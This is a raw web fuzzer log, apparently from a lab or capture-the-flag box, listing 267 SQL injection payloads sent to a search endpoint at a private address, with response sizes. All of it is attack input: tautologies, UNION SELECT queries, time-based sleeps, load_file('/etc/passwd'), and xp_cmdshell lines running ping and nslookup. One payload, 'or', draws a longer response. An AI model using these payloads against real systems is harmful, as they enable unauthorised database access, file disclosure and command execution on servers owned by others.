Target: http://10.10.11.170:8080/search
Total requests: 267
==================================================================
ID    Response   Lines      Word         Chars          Request    
==================================================================
00013:  C=200     28 L	      69 W	    755 Ch	  "pg_sleep(__TIME__)--"
00015:  C=200     28 L	      71 W	    773 Ch	  "declare @q nvarchar (200) 0x730065006c00650063 ..."
00007:  C=200     28 L	      69 W	    755 Ch	  "1) or pg_sleep(__TIME__)--"
00003:  C=200     28 L	      74 W	    792 Ch	  "; execute immediate 'sel' || 'ect us' || 'er'"
00018:  C=200     28 L	      69 W	    755 Ch	  "1) or sleep(__TIME__)#"
00001:  C=200     28 L	      68 W	    747 Ch	  ")%20or%20('x'='x"
00017:  C=200     28 L	      66 W	    729 Ch	  "insert"
00016:  C=200     28 L	      68 W	    731 Ch	  "or 0=0 #"
00002:  C=200     28 L	      67 W	    729 Ch	  "%20or%201=1"
00019:  C=200     28 L	      68 W	    747 Ch	  ") or ('a'='a"
00005:  C=200     28 L	      66 W	    729 Ch	  "update"
00004:  C=200     28 L	      66 W	    750 Ch	  "benchmark(10000000,MD5(1))#"
00026:  C=200     28 L	      68 W	    757 Ch	  ""a"" or 3=3--""
00022:  C=200     28 L	      74 W	    763 Ch	  "@var select @var as var into temp end --"
00042:  C=200     28 L	      69 W	    734 Ch	  "or 2 > 1"
00011:  C=200     28 L	      66 W	    727 Ch	  "like"
00012:  C=200     28 L	      69 W	    755 Ch	  "" or sleep(__TIME__)#"
00010:  C=200     28 L	      66 W	    729 Ch	  "delete"
00043:  C=200     28 L	      68 W	    762 Ch	  "")) or benchmark(10000000,MD5(1))#"
00009:  C=200     28 L	      68 W	    794 Ch	  ""hi"") or (""a""=""a""
00038:  C=200     28 L	      66 W	    724 Ch	  "0"
00036:  C=200     28 L	      68 W	    756 Ch	  ")) or benchmark(10000000,MD5(1))#"
00040:  C=200     28 L	      66 W	    728 Ch	  "limit"
00034:  C=200     28 L	      68 W	    739 Ch	  "UNION ALL SELECT"
00020:  C=200     28 L	      69 W	    755 Ch	  "; exec xp_regread"
00033:  C=200     28 L	      69 W	    731 Ch	  "or a = a"
00035:  C=200     28 L	      69 W	    755 Ch	  ") or sleep(__TIME__)='"
00032:  C=200     28 L	      69 W	    741 Ch	  "hi or 1=1 --""
00031:  C=200     28 L	      67 W	    744 Ch	  "or 'a'='a"
00029:  C=200     28 L	      68 W	    732 Ch	  "or 0=0 --"
00030:  C=200     28 L	      69 W	    757 Ch	  "1 waitfor delay '0:0:10'--"
00028:  C=200     28 L	      68 W	    736 Ch	  "# from wapiti"
00037:  C=200     28 L	      68 W	    752 Ch	  "hi' or 'a'='a"
00041:  C=200     28 L	      67 W	    729 Ch	  "or 1=1"
00027:  C=200     28 L	      68 W	    760 Ch	  "" or benchmark(10000000,MD5(1))#"
00024:  C=200     28 L	      66 W	    726 Ch	  "asc"
00021:  C=200     28 L	      66 W	    725 Ch	  "*|"
00044:  C=200     28 L	      66 W	    728 Ch	  "PRINT"
00006:  C=200     28 L	      69 W	    755 Ch	  "";waitfor delay '0:0:__TIME__'--"
00023:  C=200     28 L	      68 W	    757 Ch	  "1)) or benchmark(10000000,MD5(1))#"
00058:  C=200     28 L	      74 W	    773 Ch	  "declare @s varchar (200) select @s = 0x73656c6 ..."
00063:  C=200     28 L	      71 W	    751 Ch	  "x' AND email IS NULL; --"
00046:  C=200     28 L	      67 W	    729 Ch	  "or 3=3"
00057:  C=200     28 L	      69 W	    749 Ch	  "or 1=1 or ''='"
00060:  C=200     28 L	      69 W	    755 Ch	  "; exec master..xp_cmdshell 'ping 172.10.1.255'--"
00062:  C=200     28 L	      69 W	    755 Ch	  "" or pg_sleep(__TIME__)--"
00061:  C=200     28 L	      67 W	    731 Ch	  "3.10E+17"
00059:  C=200     28 L	      67 W	    730 Ch	  "exec xp"
00055:  C=200     28 L	      69 W	    758 Ch	  "or 'text' = n'text'"
00053:  C=200     28 L	      72 W	    756 Ch	  "and 1 in (select var from temp)--"
00056:  C=200     28 L	      66 W	    725 Ch	  "--"
00054:  C=200     28 L	      67 W	    750 Ch	  "or '7659'='7659"
00049:  C=200     28 L	      69 W	    755 Ch	  "1;(load_file(char(47,101,116,99,47,112,97,115, ..."
00048:  C=200     28 L	      69 W	    762 Ch	  "a' waitfor delay '0:0:10'--"
00045:  C=200     28 L	      68 W	    754 Ch	  "hi') or ('a'='a"
00066:  C=200     28 L	      69 W	    763 Ch	  "or 'unusual' = 'unusual'"
00047:  C=200     28 L	      69 W	    755 Ch	  "));waitfor delay '0:0:__TIME__'--"
00064:  C=200     28 L	      66 W	    727 Ch	  "&"
00070:  C=200     28 L	      67 W	    739 Ch	  "\x27UNION SELECT"
00108:  C=200     28 L	      67 W	    773 Ch	  "0x77616974666F722064656C61792027303A303A313027 ..."
00094:  C=200     28 L	      66 W	    733 Ch	  ",@variable"
00107:  C=200     28 L	      69 W	    755 Ch	  "union select 1,load_file('/etc/passwd'),1,1,1;"
00025:  C=200     28 L	      66 W	    724 Ch	  "(||6)"
00051:  C=200     28 L	      69 W	    755 Ch	  "1 or sleep(__TIME__)#"
00052:  C=200     28 L	      67 W	    729 Ch	  "or 1=1"
00106:  C=200     28 L	      73 W	    776 Ch	  "; begin declare @var varchar(8000) set @var=' ..."
00105:  C=200     28 L	      68 W	    756 Ch	  "or 'whatever' in ('whatever')"
00104:  C=200     28 L	      69 W	    755 Ch	  "") or sleep(__TIME__)=""
00103:  C=200     28 L	      68 W	    758 Ch	  "hi' or 'x'='x';"
00102:  C=200     28 L	      69 W	    755 Ch	  "or pg_sleep(__TIME__)--"
00101:  C=200     28 L	      69 W	    755 Ch	  "||UTL_HTTP.REQUEST"
00099:  C=200     28 L	      68 W	    755 Ch	  "1 or benchmark(10000000,MD5(1))#"
00100:  C=200     28 L	      67 W	    742 Ch	  "%20or%20''='"
00098:  C=200     28 L	      69 W	    755 Ch	  "%20$(sleep%2050)"
00093:  C=200     28 L	      69 W	    751 Ch	  "union all select @@version--"
00096:  C=200     28 L	      66 W	    732 Ch	  "or (EXISTS)"
00095:  C=200     28 L	      66 W	    734 Ch	  "(sqlattempt2)"
00050:  C=200     28 L	      67 W	    729 Ch	  "or%201=1"
00097:  C=200     28 L	      69 W	    755 Ch	  "t'exec master..xp_cmdshell 'nslookup www.googl ..."
00091:  C=200     28 L	      69 W	    755 Ch	  "1)) or pg_sleep(__TIME__)--"
00089:  C=200     28 L	      67 W	    731 Ch	  "%20'sleep%2050'"
00092:  C=200     28 L	      66 W	    744 Ch	  "/**/or/**/1/**/=/**/1"
00088:  C=200     28 L	      67 W	    773 Ch	  "0x770061006900740066006F0072002000640065006C00 ..."
00087:  C=200     28 L	      69 W	    755 Ch	  "and 1=( if((load_file(char(110,46,101,120,11 ..."
00086:  C=200     28 L	      67 W	    731 Ch	  "or 1=1--"
00085:  C=200     28 L	      71 W	    759 Ch	  "x' AND members.email IS NULL; --"
00078:  C=200     28 L	      67 W	    729 Ch	  "or a=a"
00083:  C=200     28 L	      68 W	    754 Ch	  "" or "a"="a"
00081:  C=200     28 L	      68 W	    740 Ch	  "or isNULL(1/0) /*"
00084:  C=200     28 L	      66 W	    730 Ch	  "(sqlvuln)"
00079:  C=200     28 L	      69 W	    755 Ch	  ") union select * from information_schema.tables;"
00076:  C=200     28 L	      68 W	    732 Ch	  "or%201=1 --"
00075:  C=200     28 L	      66 W	    724 Ch	  "||6"
00065:  C=200     28 L	      68 W	    742 Ch	  "admin' or '"
00068:  C=200     28 L	      66 W	    731 Ch	  "truncate"
00074:  C=200     28 L	      69 W	    755 Ch	  ""));waitfor delay '0:0:__TIME__'--"
00069:  C=200     28 L	      68 W	    756 Ch	  "1) or benchmark(10000000,MD5(1))#"
00072:  C=200     28 L	      69 W	    755 Ch	  "tz_offset"
00071:  C=200     28 L	      73 W	    773 Ch	  "declare @s varchar(200) select @s = 0x77616974 ..."
00090:  C=200     28 L	      66 W	    725 Ch	  "as"
00080:  C=200     28 L	      67 W	    739 Ch	  "PRINT @@variable"
00073:  C=200     28 L	      66 W	    730 Ch	  "sqlvuln"
00110:  C=200     28 L	      69 W	    755 Ch	  ") or pg_sleep(__TIME__)--"
00116:  C=200     28 L	      71 W	    757 Ch	  "declare @s varchar(22) select @s ="
00112:  C=200     28 L	      69 W	    755 Ch	  "or sleep(__TIME__)#"
00124:  C=200     28 L	      66 W	    729 Ch	  "having"
00127:  C=200     28 L	      74 W	    773 Ch	  "declare @s varchar (8000) select @s = 0x73656c ..."
00128:  C=200     28 L	      69 W	    736 Ch	  "‘ or 1=1 --"
00130:  C=200     28 L	      67 W	    731 Ch	  "order by"
00129:  C=200     28 L	      66 W	    739 Ch	  "char%4039%41%2b%40SELECT"
00131:  C=200     28 L	      66 W	    732 Ch	  "bfilename"
00125:  C=200     28 L	      66 W	    729 Ch	  "a'"
00122:  C=200     28 L	      68 W	    735 Ch	  "or 1 --'"
00123:  C=200     28 L	      68 W	    737 Ch	  "or 0=0 #""
00121:  C=200     28 L	      69 W	    755 Ch	  "or sleep(__TIME__)='"
00119:  C=200     28 L	      67 W	    744 Ch	  "or '1'='1"
00115:  C=200     28 L	      70 W	    753 Ch	  "a' or 'a' = 'a"
00118:  C=200     28 L	      67 W	    731 Ch	  "or a=a--"
00120:  C=200     28 L	      66 W	    724 Ch	  "|"
00067:  C=200     28 L	      66 W	    725 Ch	  "//"
00126:  C=200     28 L	      69 W	    747 Ch	  "" or isNULL(1/0) /*"
00134:  C=200     28 L	      69 W	    749 Ch	  "or username like char(37);"
00114:  C=200     28 L	      68 W	    738 Ch	  "a' or 1=1--"
00132:  C=200     28 L	      67 W	    735 Ch	  "having 1=1--"
00111:  C=200     28 L	      67 W	    735 Ch	  "union select"
00138:  C=200     28 L	      66 W	    726 Ch	  "*/*"
00113:  C=200     28 L	      69 W	    755 Ch	  "select * from information_schema.tables--"
00146:  C=200     28 L	      67 W	    742 Ch	  "or ''='"
00117:  C=200     28 L	      71 W	    743 Ch	  "or 2 between 1 and 3"
00179:  C=200     28 L	      66 W	    727 Ch	  "desc"
00176:  C=200     28 L	      68 W	    758 Ch	  "anything' OR 'x'='x"
00162:  C=200     28 L	      68 W	    732 Ch	  ") or (a=a"
00180:  C=200     28 L	      66 W	    731 Ch	  "||'6"
00177:  C=200     28 L	      72 W	    761 Ch	  "declare @q nvarchar (4000) select @q ="
00175:  C=200     28 L	      66 W	    724 Ch	  "/"
00174:  C=200     28 L	      68 W	    732 Ch	  "23 OR 1=1"
00172:  C=200     28 L	      68 W	    731 Ch	  "1 or 1=1"
00171:  C=200     28 L	      74 W	    773 Ch	  "declare @q nvarchar (200) select @q = 0x770061 ..."
00170:  C=200     28 L	      68 W	    751 Ch	  "; or '1'='1'"
00169:  C=200     28 L	      66 W	    727 Ch	  "&apos;%20OR"
00166:  C=200     28 L	      69 W	    755 Ch	  ")) or pg_sleep(__TIME__)--"
00167:  C=200     28 L	      66 W	    724 Ch	  "%7C"
00168:  C=200     28 L	      72 W	    770 Ch	  "x' AND 1=(SELECT COUNT(*) FROM tabname); --"
00178:  C=200     28 L	      68 W	    732 Ch	  "or 0=0 --"
00164:  C=200     28 L	      66 W	    730 Ch	  "replace"
00163:  C=200     28 L	      67 W	    743 Ch	  "uni/**/on sel/**/ect"
00165:  C=200     28 L	      68 W	    735 Ch	  "%27%20or%201=1"
00156:  C=200     28 L	      67 W	    730 Ch	  "exec sp"
00159:  C=200     28 L	      69 W	    735 Ch	  "ý or 1=1 --"
00158:  C=200     28 L	      66 W	    724 Ch	  "("
00160:  C=200     28 L	      69 W	    755 Ch	  "1 or pg_sleep(__TIME__)--"
00155:  C=200     28 L	      70 W	    778 Ch	  "or 'something' = 'some'+'thing'"
00154:  C=200     28 L	      67 W	    744 Ch	  "%20or%20'x'='x"
00153:  C=200     28 L	      69 W	    755 Ch	  "") or pg_sleep(__TIME__)--"
00149:  C=200     28 L	      66 W	    729 Ch	  "select"
00150:  C=200     28 L	      69 W	    755 Ch	  "")) or sleep(__TIME__)=""
00148:  C=200     28 L	      67 W	    729 Ch	  "%20or%20x=x"
00151:  C=200     28 L	      67 W	    773 Ch	  "0x730065006c0065006300740020004000400076006500 ..."
00161:  C=200     28 L	      68 W	    731 Ch	  "0 or 1=1"
00145:  C=200     28 L	      70 W	    751 Ch	  "group by userid having 1=1--"
00147:  C=200     28 L	      69 W	    755 Ch	  "; exec master..xp_cmdshell"
00144:  C=200     28 L	      66 W	    725 Ch	  "-- &password="
00152:  C=200     28 L	      69 W	    740 Ch	  "hi' or 1=1 --"
00143:  C=200     28 L	      68 W	    738 Ch	  "a' or 3=3--"
00142:  C=200     28 L	      69 W	    755 Ch	  "");waitfor delay '0:0:__TIME__'--"
00140:  C=200     28 L	      68 W	    736 Ch	  "(select top 1"
00141:  C=200     28 L	      67 W	    753 Ch	  "or benchmark(10000000,MD5(1))#"
00137:  C=200     28 L	      71 W	    752 Ch	  "x' AND userid IS NULL; --"
00139:  C=200     28 L	      69 W	    757 Ch	  "or 'text' > 't'"
00136:  C=200     28 L	      68 W	    738 Ch	  "" or 1=1--"
00135:  C=200     28 L	      69 W	    755 Ch	  ";waitfor delay '0:0:__TIME__'--"
00133:  C=200     28 L	      68 W	    755 Ch	  ") or benchmark(10000000,MD5(1))#"
00182:  C=200     28 L	      69 W	    755 Ch	  "1)) or sleep(__TIME__)#"
00184:  C=200     28 L	      74 W	    771 Ch	  "select name from syscolumns where id = (sele ..."
00188:  C=200     28 L	      66 W	    731 Ch	  "distinct"
00195:  C=200     28 L	      68 W	    732 Ch	  "or 1=1 /*"
00189:  C=200     28 L	      69 W	    755 Ch	  ");waitfor delay '0:0:__TIME__'--"
00191:  C=200     28 L	      68 W	    761 Ch	  "") or benchmark(10000000,MD5(1))#"
00183:  C=200     28 L	      68 W	    731 Ch	  "or 0=0 #"
00187:  C=200     28 L	      66 W	    738 Ch	  "password:*/=1--"
00194:  C=200     28 L	      66 W	    730 Ch	  "+sqlvuln"
00185:  C=200     28 L	      68 W	    732 Ch	  "hi or a=a"
00192:  C=200     28 L	      67 W	    735 Ch	  "UNION SELECT"
00198:  C=200     28 L	      70 W	    751 Ch	  "or 1 in (select @@version)--"
00196:  C=200     28 L	      69 W	    755 Ch	  ")) or sleep(__TIME__)='"
00190:  C=200     28 L	      69 W	    755 Ch	  "to_timestamp_tz"
00223:  C=200     28 L	      69 W	    755 Ch	  "'; exec master..xp_cmdshell 'ping 172.10.1.255'--"
00220:  C=200     28 L	      68 W	    735 Ch	  "' or 1=1"
00210:  C=200     28 L	      69 W	    755 Ch	  "")) or pg_sleep(__TIME__)--"
00214:  C=200     28 L	      66 W	    728 Ch	  "'"
00213:  C=200     28 L	      66 W	    724 Ch	  "!"
00215:  C=200     28 L	      69 W	    731 Ch	  "or a = a"
00209:  C=200     28 L	      69 W	    739 Ch	  "" or 0=0 --"
00206:  C=200     28 L	      68 W	    757 Ch	  ""a"" or 1=1--""
00205:  C=200     28 L	      67 W	    751 Ch	  "or '1'='1'--"
00201:  C=200     28 L	      70 W	    758 Ch	  "x' or 1=1 or 'x'='y"
00204:  C=200     28 L	      66 W	    732 Ch	  "@variable"
00221:  C=200     28 L	      68 W	    732 Ch	  " or 1=1 --"
00211:  C=200     28 L	      66 W	    724 Ch	  "?"
00207:  C=200     28 L	      66 W	    726 Ch	  "//*"
00203:  C=200     28 L	      69 W	    736 Ch	  "‘ or 3=3 --"
00212:  C=200     28 L	      67 W	    729 Ch	  "or 1/*"
00230:  C=200     28 L	      68 W	    737 Ch	  "' or 1=1--"
00236:  C=200     28 L	      68 W	    737 Ch	  "' or a=a--"
00208:  C=200     28 L	      66 W	    725 Ch	  "%2A%7C"
00197:  C=200     28 L	      69 W	    746 Ch	  "or 1=1 or ""="
00224:  C=200     28 L	      68 W	    748 Ch	  "'%20or%20''='"
00200:  C=200     28 L	      75 W	    771 Ch	  "union select * from users where login = char ..."
00237:  C=200     28 L	      67 W	    729 Ch	  "or a=a"
00226:  C=200     28 L	      68 W	    752 Ch	  "')%20or%20('x'='x"
00235:  C=200     28 L	      69 W	    746 Ch	  "or 1=1 or ""="
00234:  C=200     28 L	      70 W	    755 Ch	  "' or 1=1 or ''='"
00228:  C=200     28 L	      69 W	    737 Ch	  "' or 0=0 #"
00225:  C=200     28 L	      68 W	    750 Ch	  "'%20or%20'x'='x"
00240:  C=200     33 L	      92 W	   1047 Ch	  "or"
00238:  C=200     28 L	      68 W	    752 Ch	  "') or ('a'='a"
00227:  C=200     28 L	      69 W	    738 Ch	  "' or 0=0 --"
00229:  C=200     28 L	      68 W	    737 Ch	  "or 0=0 #""
00199:  C=200     28 L	      66 W	    731 Ch	  "sqlvuln;"
00233:  C=200     28 L	      67 W	    731 Ch	  "or 1=1--"
00232:  C=200     28 L	      68 W	    731 Ch	  "' or 1 --'"
00231:  C=200     28 L	      68 W	    757 Ch	  "' or '1'='1'--"
00250:  C=200     28 L	      69 W	    755 Ch	  "t'exec master..xp_cmdshell 'nslookup www.google.com'--"
00253:  C=200     28 L	      69 W	    745 Ch	  "' UNION ALL SELECT"
00239:  C=200     28 L	      68 W	    763 Ch	  "'hi' or 'x'='x';"
00248:  C=200     28 L	      69 W	    755 Ch	  "'; exec master..xp_cmdshell"
00263:  C=200     28 L	      66 W	    728 Ch	  "%26"
00242:  C=200     28 L	      66 W	    730 Ch	  "handler"
00241:  C=200     28 L	      66 W	    732 Ch	  "procedure"
00251:  C=200     28 L	      69 W	    755 Ch	  "--sp_password"
00264:  C=200     28 L	      66 W	    724 Ch	  "%21"
00257:  C=200     28 L	      67 W	    733 Ch	  "1;SELECT%20*"
00252:  C=200     28 L	      68 W	    741 Ch	  "' UNION SELECT"
00254:  C=200     28 L	      67 W	    738 Ch	  "' or (EXISTS)"
00260:  C=200     28 L	      66 W	    739 Ch	  "'sqlattempt1"
00259:  C=200     28 L	      68 W	    735 Ch	  "'%20or%201=1"
00255:  C=200     28 L	      69 W	    742 Ch	  "' (select top 1"
00249:  C=200     28 L	      69 W	    755 Ch	  "'; exec xp_regread"
00267:  C=200     28 L	      68 W	    732 Ch	  " or 3=3 --"
00261:  C=200     28 L	      66 W	    724 Ch	  "%28"
00265:  C=200     28 L	      68 W	    748 Ch	  "' or ''='"
00266:  C=200     28 L	      68 W	    735 Ch	  "' or 3=3"
00256:  C=200     28 L	      69 W	    755 Ch	  "'||UTL_HTTP.REQUEST"

Total time: 0
Processed Requests: 267
Filtered Requests: 24
Requests/sec.: 0
